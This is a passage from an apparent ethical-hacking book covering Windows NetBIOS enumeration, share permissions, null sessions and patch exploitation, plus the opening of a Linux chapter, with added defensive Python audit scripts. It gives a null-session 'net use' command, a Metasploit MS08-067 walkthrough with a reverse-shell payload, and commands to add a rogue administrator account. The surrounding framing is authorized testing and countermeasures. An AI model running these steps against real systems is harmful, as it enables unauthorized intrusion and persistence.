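        data, _ = s.recvfrom(1024)
    return parse_node_status_response(data)


if __name__ == "__main__":
    table = parse_node_status_response(build_sample_response())
    for n in table["names"]:
        print(f"{n['name']:<15} <{n['suffix']:02X}>  {'GROUP ' if n['group'] else 'UNIQUE'}  {n['meaning']}")
    print("MAC Address =", table["mac"], summarize(table))
```

The request is a single 50-byte datagram, which is why a host firewall that leaves UDP 137 open hands this information to anyone on the segment. The suffix table is the same decoding nbtstat applies when it labels entries UNIQUE or GROUP.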

Shares

Windows uses network shares to share certain folders or drives on the system so other users can access them across the network. Shares are easy to set up and provide a great way to share files with other users on the network without having to involve a server. However, they're often misconfigured, allowing users, malware, and external attackers that have made their way inside the network to access information they shouldn't be able to get to otherwise. You can search for Windows network shares by using the Share Finder tool built into LanGuard. This tool scans an entire range of IP addresses, looking for Windows shares, as shown in Figure 12-5.

Figure 12-5: Using LanGuard to scan your network for Windows shares.

The Everyone group has full share and file access to the Life and Health share on the THINKPAD host. I see situations like this all the time where someone shares their local drive so others can access it. The problem is they often forget to remove the permissions and leave a gaping hole for a security breach.

The shares displayed in Figure 12-5 are just what malicious insiders are looking for because the share names give a hint of what type of files might be accessible if they connect to the shares. After those with ill intent discover such shares, they're likely to dig a little further to see whether they can browse and access the files within the shares. I cover shares and rooting out sensitive information on network shares later in this chapter and in Chapter 16.

Countermeasures against NetBIOS attacks

You can implement the following security countermeasures to minimize NetBIOS and NetBIOS over TCP/IP attacks on your Windows systems:

- Use a network firewall.
- Use Windows Firewall or some other personal firewall software on each system.
- Disable Windows File and Printer Sharing, which can be found in the Windows Control Panel. For example, in Windows 8.1 it's located under Control Panel, Network and Internet, Network and Sharing Center, Change advanced sharing settings.
- Educate your users on the dangers of enabling file shares with improper security access controls that let everyone in. I cover these risks further in this chapter as well as in Chapter 16. They're no doubt one of the greatest risks on most networks today.

Hidden shares, those with a dollar sign ($) appended to the end of the share name, don't really help hide the share name. Any of the tools I've mentioned can see right through this form of security by obscurity. In fact, if you come across such shares, you'll want to look at them more closely, as a user may be trying to hide something or otherwise knows that the information on the share is sensitive and doesn't want to draw attention to it.

Detecting Null Sessions

A well-known vulnerability within Windows can map an anonymous connection (or null session) to a hidden share called IPC$ (which stands for interprocess communication). This attack method can be used to

- Gather Windows host configuration information, such as user IDs and share names.
- Edit parts of the remote computer's registry.

Although Windows Server 2008 and up as well as Windows 7, Windows 8, and Windows 10 don't allow null session connections by default, I often come across systems that have been configured to allow them (or that have simply had Windows Firewall disabled, exposing the SMB ports), so this vulnerability can still cause problems on your network.

Although later versions of Windows are much more secure than their predecessors, don't assume that all's well in Windows-land. I can't tell you how many times I see supposedly secure Windows installations "tweaked" to accommodate an application or other business need that happens to facilitate exploitation.

Mapping

Follow these steps for each Windows computer to which you want to map a null session:

1. Format the basic net command, like this:

net use \\host_name_or_IP_address\ipc$ "" /user:""

The net command to map null sessions requires these parameters:

- net (the built-in Windows network command) followed by the use command
- The IP address or hostname of the system to which you want to map a null connection
- A blank password and username

The blanks are why it's called a null connection.

2. Press Enter to make the connection.

Figure 12-6 shows an example of the complete command when mapping a null session. After you map the null session, you should see the message "The command completed successfully."

Figure 12-6: Mapping a null session to a vulnerable Windows system.

To confirm that the sessions are mapped, enter this command at the command prompt:

net use

As shown in Figure 12-6, you should see the mappings to the IPC$ share on each computer to which you're connected. When you're done testing, drop each mapping with net use \\host_name_or_IP_address\ipc$ /delete so you don't leave stray connections behind.

Gleaning information

With a null session connection, you can use other utilities to gather critical Windows information remotely. Dozens of tools can gather this type of information.

You, like a hacker, can take the output of these enumeration programs and attempt (as an unauthorized user) to

- Crack the passwords of the users found. (See Chapter 8 for more on password cracking.)
- Map drives to each computer's network shares.

You can use the following applications for system enumeration against server versions of Windows prior to Server 2003 as well as Windows XP. Don't laugh; I still see these archaic versions of Windows running.

net view

The net view command (net view \\host_name_or_IP_address; see Figure 12-7) shows shares that the Windows host has available. You can use the output of this program to see information that the server is advertising to the world and what can be done with it, including the following:

- Share information that an attacker can use to exploit your systems, such as mapping drives and cracking share passwords.
- Share permissions that might need to be removed, such as the permission for the Everyone group to at least see the share on older Windows 2000-based systems if you have those on your network.

Figure 12-7: net view displays drive shares on a remote Windows host.

Configuration and user information

Winfo (www.ntsecurity.nu/toolbox/winfo) and DumpSec (www.systemtools.com/somarsoft/index.html) can gather useful information about users and configurations, such as

- Windows domain to which the system belongs
- Security policy settings
- Local usernames
- Drive shares

Your preference might depend on whether you like graphical interfaces or a command line:

- Winfo is a command-line tool.
- DumpSec is a graphical tool.

Because Winfo is a command-line tool, you can create batch (script) files that automate the enumeration process. The following is an abbreviated version of Winfo's output for a Windows NT server, but you can collect the same information from other Windows systems that still accept null sessions:

Winfo 2.0 - copyright (c) 1999-2003, Arne Vidstrom
- http://www.ntsecurity.nu/toolbox/winfo/

SYSTEM INFORMATION:
- OS version: 4.0

PASSWORD POLICY:
- Time between end of logon time and forced logoff: No forced logoff
- Maximum password age: 42 days
- Minimum password age: 0 days
- Password history length: 0 passwords
- Minimum password length: 0 characters

USER ACCOUNTS:
* Administrator
(This account is the built-in administrator account)
* doctorx
* Guest
(This account is the built-in guest account)
* IUSR_WINNT
* kbeaver
* nikki

SHARES:
* ADMIN$
- Type: Special share reserved for IPC or administrative share
* IPC$
- Type: Unknown
* Here2Bhacked
- Type: Disk drive
* C$
- Type: Special share reserved for IPC or administrative share
* Finance
- Type: Disk drive
* HR
- Type: Disk drive

This information cannot be gleaned from a default installation of Windows Server 2003, Windows XP, or later versions of Windows; you get it only from older systems, or from newer ones whose anonymous-access settings have been loosened to allow null sessions.

You can peruse the output of such tools for user IDs that don't belong on your system, such as

- Ex-employee accounts that haven't been disabled
- Potential backdoor accounts that a hacker might have created

If attackers get this information, they can attempt to exploit potentially weak passwords and log in as those users.
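Because Winfo writes plain text, the review just described (scanning the dump for accounts that don't belong and for a weak password policy) can be scripted, which is the point of the batch-file remark above. The following is an added Python example, not part of the book or of Winfo, that parses a Winfo-style dump and raises findings: weak password policy, the built-in Guest and IIS anonymous accounts being enumerable, accounts missing from a known roster, and disk shares visible to an anonymous user. The embedded sample reproduces the output shown above and is constructed, not a capture; the roster of known users, the 8-character and 5-password thresholds, and the wording of the findings are my assumptions.

```python
import re

# Constructed sample in Winfo 2.0's format, mirroring the abbreviated dump above.
SAMPLE_WINFO = """\
Winfo 2.0 - copyright (c) 1999-2003, Arne Vidstrom
 - http://www.ntsecurity.nu/toolbox/winfo/

SYSTEM INFORMATION:
 - OS version: 4.0

PASSWORD POLICY:
 - Time between end of logon time and forced logoff: No forced logoff
 - Maximum password age: 42 days
 - Minimum password age: 0 days
 - Password history length: 0 passwords
 - Minimum password length: 0 characters

USER ACCOUNTS:
 * Administrator
   (This account is the built-in administrator account)
 * doctorx
 * Guest
   (This account is the built-in guest account)
 * IUSR_WINNT
 * kbeaver
 * nikki

SHARES:
 * ADMIN$
   - Type: Special share reserved for IPC or administrative share
 * IPC$
   - Type: Unknown
 * Here2Bhacked
   - Type: Disk drive
 * C$
   - Type: Special share reserved for IPC or administrative share
 * Finance
   - Type: Disk drive
 * HR
   - Type: Disk drive
"""

SECTION_RE = re.compile(r"^([A-Z][A-Z ]+):\s*$")   # e.g. "PASSWORD POLICY:"


def parse_winfo(text):
    """Turn Winfo's text dump into a dict: system info, policy values, user list, share -> type."""
    result = {"system": {}, "policy": {}, "users": [], "shares": {}}
    section, current = None, None
    for line in text.splitlines():
        stripped = line.strip()
        m = SECTION_RE.match(stripped)
        if m:
            section = m.group(1)
            continue
        if stripped.startswith("* "):                      # "* name" starts a user or share entry
            current = stripped[2:].strip()
            if section == "USER ACCOUNTS":
                result["users"].append(current)
            elif section == "SHARES":
                result["shares"][current] = None
        elif stripped.startswith("- ") and ":" in stripped:  # "- key: value" attribute line
            key, _, value = stripped[2:].partition(":")
            key, value = key.strip(), value.strip()
            if section == "SYSTEM INFORMATION":
                result["system"][key] = value
            elif section == "PASSWORD POLICY":
                result["policy"][key] = value
            elif section == "SHARES" and key == "Type" and current:
                result["shares"][current] = value
    return result


def _leading_int(value):
    """'0 characters' -> 0; None when the value does not start with a number."""
    m = re.match(r"\d+", value)
    return int(m.group()) if m else None


def audit_winfo(parsed, expected_users, min_len=8, min_history=5):
    """Findings a reviewer would raise from null-session output. Thresholds are assumptions."""
    findings = []
    pol = parsed["policy"]
    length = _leading_int(pol.get("Minimum password length", ""))
    if length is not None and length < min_len:
        findings.append(f"policy: minimum password length is {length} (want >= {min_len})")
    history = _leading_int(pol.get("Password history length", ""))
    if history is not None and history < min_history:
        findings.append(f"policy: password history is {history} (want >= {min_history})")
    for user in parsed["users"]:
        if user == "Guest":
            findings.append("account: built-in Guest is enumerable; confirm it is disabled")
        elif user.startswith("IUSR_"):
            findings.append(f"account: IIS anonymous account {user} exposed; review its rights")
        elif user != "Administrator" and user not in expected_users:
            findings.append(f"account: {user} is not in the known user roster (ex-employee or backdoor?)")
    for share, kind in parsed["shares"].items():
        if kind == "Disk drive" and not share.endswith("$"):
            findings.append(f"share: {share} is a disk share visible to anonymous users; check its ACLs")
    return findings


if __name__ == "__main__":
    for finding in audit_winfo(parse_winfo(SAMPLE_WINFO), expected_users={"kbeaver", "nikki"}):
        print(finding)
```

Feed it the saved output of one Winfo run per host and diff the findings between assessments; a new name in the roster findings is exactly the "potential backdoor account" case the text warns about.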

Countermeasures against null session hacks

If it makes good business sense and the timing is right, upgrade to the more secure Windows Server 2012 or Windows Server 2016 as well as Windows 7 or Windows 10. In their default configurations they don't have the vulnerabilities described in the following list.

You can easily prevent null session connection hacks by implementing one or more of the following security measures:

- Block NetBIOS on your Windows server by preventing these TCP ports from passing through your network firewall or personal firewall:
  - 139 (NetBIOS session service)
  - 445 (SMB over TCP/IP without NetBIOS)
- Disable File and Printer Sharing for Microsoft Networks in the Properties tab of the machine's network connection for those systems that don't need it.
- Restrict anonymous connections to the system. If you happen to have any Windows NT and Windows 2000 systems left in your environment (hopefully not!), you can set HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA\RestrictAnonymous to a DWORD value as follows:
  - None. Rely on Default Permissions (Setting 0): This is the default setting. It allows the default null session connections.
  - Do Not Allow Enumeration of SAM Accounts and Shares (Setting 1): This is the medium security level setting. It still allows null sessions to be mapped to IPC$, enabling such tools as Walksam to garner information from the system.
  - No Access without Explicit Anonymous Permissions (Setting 2): This high security setting prevents null session connections and system enumeration.

High security creates problems for domain controller communication and network browsing, so be careful! You can end up crippling the network.

Microsoft Knowledge Base Article 246261 covers the caveats of using the high security setting for RestrictAnonymous. It's available on the web at http://support.microsoft.com/default.aspx?scid=KB;en-us;246261.

For later versions of Windows, such as Windows Server 2008 R2 and Windows 7, ensure that the "Network access" anonymous-related settings of the local or group security policy are set as shown in Figure 12-8.

Figure 12-8: Default local security policy settings in Windows 7 that restrict null session connections.
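The "Network access" policy items in Figure 12-8 are stored as plain registry values, so you can verify them from a script rather than clicking through the Local Security Policy console on every host. Here is an added Python example (not the book's code) that maps each policy to its registry value and reports anything that is not in the hardened state; on Windows, read_live_values pulls the real values through the standard winreg module, and elsewhere the two embedded configurations, a hardened one and a "tweaked" one that lets null sessions back in, are constructed samples. The key and value names are the ones Microsoft documents for these policies; the defaults applied when a value is absent, and the choice to treat RestrictAnonymous=0 as a finding, are my assumptions.

```python
import sys

# Registry locations behind the "Network access:" items in Local Security Policy.
LSA = r"SYSTEM\CurrentControlSet\Control\Lsa"
SRV = r"SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters"

# (key, value name, hardened DWORD value, policy text as the console shows it)
CHECKS = [
    (LSA, "RestrictAnonymousSAM", 1, "Do not allow anonymous enumeration of SAM accounts"),
    (LSA, "RestrictAnonymous", 1, "Do not allow anonymous enumeration of SAM accounts and shares"),
    (LSA, "EveryoneIncludesAnonymous", 0, "Let Everyone permissions apply to anonymous users"),
    (SRV, "RestrictNullSessAccess", 1, "Restrict anonymous access to Named Pipes and Shares"),
]
# REG_MULTI_SZ lists that grant anonymous access by name; the hardened state is an empty list
LIST_CHECKS = [
    (SRV, "NullSessionPipes", "Named Pipes that can be accessed anonymously"),
    (SRV, "NullSessionShares", "Shares that can be accessed anonymously"),
]
# Value Windows behaves as if set when the entry is absent (assumption: Vista-era defaults)
DEFAULTS = {"RestrictAnonymousSAM": 1, "RestrictAnonymous": 0,
            "EveryoneIncludesAnonymous": 0, "RestrictNullSessAccess": 1}


def assess_anonymous_access(values):
    """values maps (key, name) -> registry data (int, list of str, or None when absent).
    Returns (policy, actual, expected) tuples; an empty list means every check passed."""
    findings = []
    for key, name, want, policy in CHECKS:
        actual = values.get((key, name))
        if actual is None:
            actual = DEFAULTS[name]
        if actual != want:
            findings.append((policy, actual, want))
    for key, name, policy in LIST_CHECKS:
        entries = [e for e in (values.get((key, name)) or []) if e]
        if entries:
            findings.append((policy, entries, []))
    return findings


def read_live_values():
    """Read the same values from the local registry (Windows only; uses the winreg module)."""
    import winreg
    out = {}
    for key, name in {(k, n) for k, n, *_ in CHECKS + LIST_CHECKS}:
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key) as handle:
                out[(key, name)] = winreg.QueryValueEx(handle, name)[0]
        except OSError:                    # key or value missing: let DEFAULTS apply
            out[(key, name)] = None
    return out


# Constructed states (not captures): a hardened host and one "tweaked" to permit null sessions.
HARDENED = {(LSA, "RestrictAnonymousSAM"): 1, (LSA, "RestrictAnonymous"): 1,
            (LSA, "EveryoneIncludesAnonymous"): 0, (SRV, "RestrictNullSessAccess"): 1,
            (SRV, "NullSessionPipes"): [], (SRV, "NullSessionShares"): []}
TWEAKED = {(LSA, "RestrictAnonymousSAM"): 0, (LSA, "RestrictAnonymous"): 0,
           (LSA, "EveryoneIncludesAnonymous"): 1, (SRV, "RestrictNullSessAccess"): 0,
           (SRV, "NullSessionPipes"): ["netlogon", "samr", "lsarpc"],
           (SRV, "NullSessionShares"): ["COMCFG"]}

if __name__ == "__main__":
    values = read_live_values() if sys.platform == "win32" else TWEAKED
    for policy, actual, want in assess_anonymous_access(values):
        print(f"[!] {policy}: {actual!r} (expected {want!r})")
```

The same mapping works in reverse: when a null session unexpectedly succeeds against a current Windows host, these six values are the first place to look for the "tweak" that let it through.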

Checking Share Permissions

Windows shares are the available network drives that show up when users browse the network in My Network Places (or Network, in current versions). Windows shares are often misconfigured, allowing more people to have access to them than they should. The casual browser can exploit this security vulnerability, but a malicious insider gaining unauthorized access to a Windows system can result in serious security and compliance consequences, including the leakage of sensitive information and even the corruption or deletion of critical files.

Windows defaults

The default share permission depends on the Windows system version.

Windows 2000/NT

When creating shares in Windows NT and Windows 2000, the group Everyone is given Full Control access in the share by default for all files to:

- Browse files
- Read files
- Write files

You should no longer have these versions of Windows running on your network, but I do still see these versions out there.

Anyone who maps to the IPC$ connection with a null session (as described in the previous section, "Detecting Null Sessions") is automatically made part of the Everyone group. This means that remote hackers can automatically gain Browse, Read, and Write access to a Windows NT or Windows 2000 server after establishing a null session.

Windows XP and newer

In Windows XP and newer (Windows Server 2008 R2, Windows 7, and so on), the Everyone group is given only Read access to shares. This is definitely an improvement over the defaults in Windows 2000 and Windows NT. However, you still might have situations in which you don't want the Everyone group to even have Read access to a share.

Share permissions are different from file (NTFS) permissions. When creating shares, you have to set both, and a user's effective access over the network is the more restrictive of the two. In current versions of Windows, this helps create hoops for casual users to jump through and discourages share creation, but it's not foolproof. Unless you have your Windows desktops completely locked down, users can still share out their files at will.

Testing

Assessing your share permissions is a good way to get an overall view of who can access what. This testing shows how vulnerable your network shares, and the sensitive information on them, can be. You can find shares with default permissions and unnecessary access rights enabled. Trust me; they're everywhere!

The best way to test for share weaknesses is to log in to the Windows system via a standard local or domain user with no special privileges and run an enumeration program so you can see who has access to what.

As I outlined earlier, LanGuard has built-in share finder capabilities for uncovering unprotected shares, the options for which are shown in Figure 12-9.

Figure 12-9: LanGuard's Share Finder profile seeks out Windows shares.

I outline more details on uncovering sensitive information in unstructured files on network shares and other storage systems in Chapter 16.

Exploiting Missing Patches

It's one thing to poke and prod Windows to find vulnerabilities that might eventually lead to some good information, maybe system access. However, it's quite another to stumble across a vulnerability that will provide you with full and complete system access, all within 10 minutes. When an advisory says an attacker can "run arbitrary code" on a system, that's not an empty threat. With such tools as Metasploit, all it takes is one missing patch on one system to gain access and demonstrate how the entire network can be compromised. A missing patch like this is the criminal hacker's pot of gold.

Even with all the written security policies and fancy patch management tools, on every network I come across, numerous Windows systems don't have all the patches applied. There may be a reason for it, such as false positives from vulnerability scanners, or the missing patches have been deemed to be acceptable risks. Even if you think all your systems have the latest patches installed, you have to be sure. It's what security assessments are all about: trust but verify.

Before you go 'sploitin' vulnerabilities with Metasploit, it's very important to know that you're venturing into sensitive territory. Not only can you gain full, unauthorized access to sensitive systems, but you can also put the systems being tested into a state where they can hang or reboot. So, read each exploit's documentation and proceed with caution.

Before you can exploit a missing patch or related vulnerability, you have to first find out what's available for exploitation. The best way to go about doing this is to use a tool such as Nexpose or LanGuard to find them. I've found Nexpose to be very good at rooting out such vulnerabilities even as an unauthenticated user on the network. Figure 12-10 shows Nexpose scan results of a Windows server system that has the nasty Windows Server service remote code execution vulnerability (MS08-067) from 2008 that I still see quite often. (MS08-067 is the netapi32 flaw in the Server service that the Conficker worm exploited; it is not the older Plug and Play flaw.)

Figure 12-10: Exploitable vulnerability found by Nexpose.

Windows 10 security

With all the vulnerabilities in Windows, it's sometimes tempting to jump ship and move to Linux or Mac OS X. But not so fast. Microsoft made great strides with security in Windows 7 and Windows 8.x, both of which have laid the groundwork for what's now the much more secure Windows 10.

Building on Windows 8.x, Microsoft has made even more improvements in Windows 10 beyond the restored Start button and Start menu, including the following:

- Windows Update for Business, which provides greater control over enterprise Windows patch management.
- Scheduled restarts for Windows patches to perhaps nudge users along.
- Windows Hello for user authentication, supporting existing fingerprint scanners and other biometric devices such as face and iris scanners.

Finally, Windows 10 is even faster than Windows 8, which is really nice, especially if you use the OS for security testing. Its speed might also be just what you need to put an end to users disabling their antivirus software to speed their computers up, which happens quite often.

Having run various scans and attacks against Windows 10 systems, I've found that it's a darn secure default installation. But that doesn't mean Windows 10 is immune to attack and abuse. As long as the human element is involved in software development, network administration, and end-user functions, people will continue to make mistakes that leave windows open (pun intended) for the bad guys to sneak through and carry out their attacks. The key is to make sure you never let your guard down!

Using Metasploit

After you find a vulnerability, the next step is to exploit it. In this example, I use Metasploit Framework (an open source tool owned and maintained by Rapid7) and obtain a remote command prompt on the vulnerable server. Here's how:

1. Download and install Metasploit (currently at version 4.11) from www.rapid7.com/products/metasploit/download.jsp.

I use the Windows version; all you have to do is download and run the executable.

2. After the installation is complete, run the Metasploit Console, which is Metasploit's main console.

There's also a web-based version of Metasploit that you can access through your browser (Metasploit Web UI), but I prefer the console interface.

You see a screen similar to the one shown in Figure 12-11.

3. Enter the exploit you wish to run. For example, if you want to run the Microsoft MS08-067 Server service exploit, enter the following:

use exploit/windows/smb/ms08_067_netapi

4. Enter the remote host (RHOST) you wish to target and the IP address of the local host (LHOST) you're on with the following commands:

set RHOST ip_address
set LHOST ip_address

5. Set the target operating system (usually 0 for automatic targeting) with the following command:

set TARGET 0

6. Set the payload (the code the exploit delivers and runs on the target) that you want to execute. I typically choose windows/shell_reverse_tcp, as it provides a remote command prompt on the system being exploited:

set PAYLOAD windows/shell_reverse_tcp

Figure 12-12 shows what you should have displayed in the Metasploit console screen.

7. The final step is to simply enter exploit in the Metasploit console. This command invokes the final step where Metasploit delivers the payload to the target system. Assuming the exploit is successful, you should be presented with a command prompt where you can enter typical DOS commands such as dir, as shown in Figure 12-13.

Figure 12-11: The main Metasploit console.

Figure 12-12: Metasploit options to obtain a remote command prompt on the target system.

Figure 12-13: Remote command prompt on target system obtained by exploiting a missing Windows patch.

In this ironic example, a Mac is running Windows via the Boot Camp software. I now "own" the system and am able to do whatever I want. For example, one thing I commonly do is add a user account to the exploited system. You can actually do this within Metasploit (via the adduser payloads), but I prefer to do it on my own so I can get screenshots of my actions. To add a user, simply enter net user username password /add at the remote command prompt that Metasploit returned.

Next, I add the user to the local Administrators group by entering net localgroup administrators username /add at that same prompt. You can then log in to the remote system by mapping a drive to the C$ share or by connecting via Remote Desktop.

If you choose to add a user account during this phase, be sure to remove it (net user username /delete) when you finish. Otherwise, you can create another vulnerability on the system, especially if the account has a weak password. Chapter 3 covers related issues, such as the need for a contract when performing your testing. You want to make sure you've covered yourself.

All in all, this is hacking at its finest!

Three unique versions of Metasploit are available from Rapid7. The free edition outlined in the preceding steps is called Metasploit Framework. It may be all you need if an occasional screenshot of remote access or similar is sufficient for your testing purposes. There's also Metasploit Community, which is accessible via a web user interface and intended for small networks. Finally, there's a full-blown commercial version called Metasploit Pro for the serious security professional. Metasploit Pro adds features for social engineering, web application scanning, and detailed reporting.

Metasploit Pro's Overview screen is shown in Figure 12-14. Note the workflow features in the Quick Start Wizards icons, including Quick PenTest, Phishing Campaign, and Web App Test. It's a well-thought-out interface that takes the pain out of traditional security scanning, exploitation, and reporting, which is especially useful for the less technical IT professional.

Figure 12-14: Metasploit Pro's graphical interface provides broad security testing capabilities including phishing and web application security checks.

Metasploit Pro provides you with the ability to import scanner findings (typically XML files) from third-party vulnerability scanners such as Acunetix Web Vulnerability Scanner, Netsparker, and Nexpose. Simply click the name of your project in the Project Listing section (or create a new one by selecting New Project) and then click the Import button. After the scan data file is imported, you can click the Vulnerabilities tab and see all the original vulnerability scanner findings. To exploit one of the vulnerabilities (assuming it's a supported exploit in Metasploit Pro), simply click the finding under the Name column and you'll be presented with a new page that allows you to click Exploit and execute the flaw, as shown in Figure 12-15.

Figure 12-15: Starting the exploit process in Metasploit Pro is as simple as importing your scanner findings and clicking Exploit.

Keep in mind that I've demonstrated only a fraction of what Metasploit Framework and Metasploit Pro can do. I highly recommend you download one or both and familiarize yourself with these tools. Numerous resources are available at www.metasploit.com/help that can help you take your skill set to the next level. The power of Metasploit is unbelievable all by itself. Combine it with the exploit code that's continually updated at sites such as Offensive Security's Exploit Database (www.exploit-db.com), and you have practically everything you need if you choose to drill down to that level of exploitation in your security testing.

Countermeasures against missing patch vulnerability exploits

Patch your systems, both the Windows OS and any Microsoft or third-party applications running on them. I know it's a lot easier said than done. Seriously, that's all there is to it. Combine that with the other hardening recommendations I provide in this chapter, and you have a pretty darned secure Windows environment.

To get your arms around the patching process, you have to automate it wherever you can. You can use Windows Update, or better yet, Windows Server Update Services (WSUS) for Microsoft-centric patches, which can be found at http://technet.microsoft.com/en-us/wsus/default.aspx. I can't stress enough how you need to get your third-party patches for Adobe, Java, and so on under control. If you're looking for a commercial alternative, check out GFI LanGuard's patch management features (www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard) and Lumension Patch and Remediation (www.lumension.com/vulnerability-management/patch-management-software.aspx). I cover patching more in depth in Chapter 18.

Running Authenticated Scans

Another test you can run against your Windows systems is an "authenticated" scan, essentially looking for vulnerabilities as a trusted user. I find these types of tests to be very beneficial because they often highlight system problems and even operational security weaknesses (such as poor change management processes, weak patch management, and lack of information classification) that would never be discovered otherwise.

A trusted insider who has physical access to your network and the right tools can exploit vulnerabilities even more easily. This is especially true if no internal access control lists or IPS is in place and/or a malware infection occurs.

A way to look for Windows weaknesses while you're logged in (that is, through the eyes of a malicious insider) is by using some of the vulnerability scanning tools I've mentioned, such as LanGuard and Nexpose. Figure 12-16 shows the nice (and rare) feature that Nexpose has to test your login credentials before getting vulnerability scans started. Being able to validate login credentials before you start your scans can save an amazing amount of time, hassle, and money.

Figure 12-16: Testing login credentials before running an authenticated scan with Nexpose to see what trusted insiders can see and exploit.

I recommend running authenticated scans as a domain or local administrator. This will show you the greatest number of security flaws as well as who has access to what in the event that a vulnerability is present. You'll likely be surprised to find out that a large portion of vulnerabilities, such as those listed in Figure 12-16, are accessible via a standard user account. You don't necessarily need to run authenticated scans every time you test for security flaws, but doing so at least once or twice per year is not a bad idea.

You can also use Microsoft Baseline Security Analyzer (MBSA) to check for basic vulnerabilities and missing patches. MBSA is a free utility from Microsoft that you can download at www.microsoft.com/technet/security/tools/mbsahome.mspx. MBSA checks all Windows XP and later (Windows 10 is not yet supported) operating systems for missing patches. It also tests Windows, SQL Server, Office, and IIS for basic security settings, such as weak passwords. You can use these tests to identify security weaknesses in your systems.

With MBSA, you can scan either the local system you're logged into or computers across the network. One caveat: MBSA requires an administrator account on the local machines you're scanning.

Chapter 13

Linux

In This Chapter

- Examining Linux hacking tools
- Port scanning Linux hosts
- Gleaning Linux information without logging in
- Exploiting common vulnerabilities when logged in to Linux
- Minimizing Linux security risks

Linux hasn't made inroads onto the enterprise desktop the way that Windows has, but Linux still has its presence in practically every network nonetheless. A common misconception is that Linux is more secure than Windows. However, more and more, Linux and its sister variants of UNIX are prone to some of the same types of security vulnerabilities, so you can't let your guard down.

Hackers are attacking Linux in droves because of its popularity and growing usage in today's network environment. Because some versions of Linux are free, in the sense that you don't have to pay for the base operating system, many organizations are installing Linux for their web servers and e-mail servers in hopes of saving money and having a more secure system. Linux has grown in popularity for other reasons as well, including the following:

- Abundant resources are available, including books, websites, and developer and consultant expertise.
- There's a lower risk that Linux will be hit with as much malware as Windows and its applications have to deal with. Linux excels when it comes to security, but it probably won't stay that way.
- There has been increased buy-in from other UNIX vendors, including IBM, HP, and Oracle.
- UNIX and Linux have become increasingly easier to use.

Workstation operating systems such as Mac OS X and Chrome OS are becoming mainstream in business today. These OSs are based on UNIX/Linux cores and are susceptible to many of the Linux flaws I discuss in this chapter. Therefore, they need to be included in the scope of your security tests.

In my own security assessment work, I'm not seeing many glaring Chrome OS-based vulnerabilities (yet), but I am seeing weaknesses in Mac OS X, especially as it involves third-party software that can be exploited by malware and even tools such as Metasploit. I see such flaws more often when performing authenticated scans, so make sure you're doing those as well.

Based on what I see in my work, Linux is less vulnerable to common security flaws, especially as it relates to missing third-party patches for Adobe, Java, and the like, than Windows. When comparing any current distribution of Linux, such as Ubuntu and Red Hat/Fedora, with Windows 7 or Windows 10, I tend to find more weaknesses in the Windows systems. Chalk it up to widespread use, more features, or uneducated users, but there seems to be a lot more that can happen in a Windows environment. That said, Linux is certainly not flawless. In addition to the password attacks I cover in Chapter 8, certain remote and local attacks are possible against Linux-based systems. In this chapter, I show you some security issues in the Linux operating system and outline some countermeasures to plug the holes so you can keep the bad guys out. Don't let the title of this chapter fool you; a lot of this information applies to all flavors of UNIX.

Understanding Linux Vulnerabilities

Vulnerabilities and attacks against Linux are creating business risks in a growing number of organizations, especially e-commerce companies, network and IT/security vendors, and cloud service providers that rely on Linux for many of their systems, including their own products. When Linux systems are hacked, the victim organizations can experience the same side effects as their Windows-using counterparts, including:

- Leakage of sensitive information
- Cracked passwords
- Corrupted or deleted databases
- Systems taken completely offline

Choosing Tools

You can use many Linux-based security tools to test your Linux systems. Some are much better than others. I often find that my Windows-based commercial tools do as good a job as any. My favorites are as follows:

- Kali Linux (www.kali.org) toolset on a bootable DVD or .iso image file
- LanGuard (www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard) for port scanning, OS enumeration, and vulnerability testing
- NetScanTools Pro (www.netscantools.com) for port scanning, OS enumeration, and much more
- Nexpose (www.rapid7.com/products/nexpose) for detailed port scanning, OS enumeration, and vulnerability testing. A tool such as Nexpose can perform the majority of the security testing needed to find flaws in Linux. Another popular commercial alternative is offered by Qualys (www.qualys.com).
- Nmap (https://nmap.org) for OS fingerprinting and detailed port scanning
- Nessus (www.tenable.com/products/nessus-vulnerability-scanner) for OS fingerprinting, port scanning, and vulnerability testing

Many other Linux hacking and testing tools are available on such sites as SourceForge.net (http://sourceforge.net) and freecode.com (http://freecode.com). The key is to find a set of tools, preferably as few as possible, that can do the job that you need to do and that you feel comfortable working with.

Gathering Information About Your Linux Vulnerabilities

You can scan your Linux-based systems and gather information from both outside (if the system is a publicly-accessible host) and inside your network. That way, you can see what the bad guys see from both directions.

System scanning

Linux services — called daemons — are the programs that run on a system and serve up various services and applications for users.

Internet services, such as the Apache web server (httpd), telnet (telnetd), and FTP (ftpd), often give away too much information about the system, including software versions, internal IP addresses, and usernames. This information could allow hackers to exploit a known weakness in the system. TCP and UDP small services, such as echo, daytime, and chargen, are often enabled by default and don't need to be.

The vulnerabilities inherent in your Linux systems depend on what services are running. You can perform basic port scans to glean information about what's running.

The NetScanTools Pro results in Figure 13-1 show many potentially vulnerable services on this Linux system, including the confirmed services of SSH, HTTP, and HTTPS.

Figure 13-1: Port scanning a Linux host with NetScanTools Pro.

In addition to NetScanTools Pro, you can run another scanner, such as Nexpose, against the system to try to gather more information, including a server running SSL version 3 with weak encryption ciphers, as shown in Figure 13-2.

Figure 13-2: Using Nexpose to discover vulnerabilities with SSL.

Keep in mind that you're going to find the most vulnerabilities in Linux and Mac OS X by performing authenticated vulnerability scans. This is particularly important to do because it shows you what's exploitable by users — or malware — on your systems. And, yes, even Linux and Mac OS X are susceptible to malware! You'll want to run such scans at least once per year or after any major application or OS upgrades on your workstations and servers.

Figure 13-3 shows the absolutely amazing feature in Nexpose that allows you to actually test your login credentials before kicking off a vulnerability scan of your network.

Figure 13-3: Using the Test Credentials feature as part of the Nexpose scan configuration.

What's the big deal about this feature, you say? Well, first off, it can be a whole lot of hassle to think you're entering the proper login credentials into the scanner only to find out hours later that the logins were not successful, which can invalidate the scan you ran. It can also be a threat to your budget (or wallet, if you work for yourself) if you're charged by the scan only to discover that you have to re-scan hundreds, even thousands, of network hosts. I've been down that road many times and it's a real pain, to say the least.

You can use free tools to go a step further and find out the exact distribution and kernel version by running an OS fingerprint scan with the Nmap command nmap -sV -O <target>, as shown in Figure 13-4. (The -O option needs raw socket access, so run Nmap as root or through sudo for OS detection to work.)

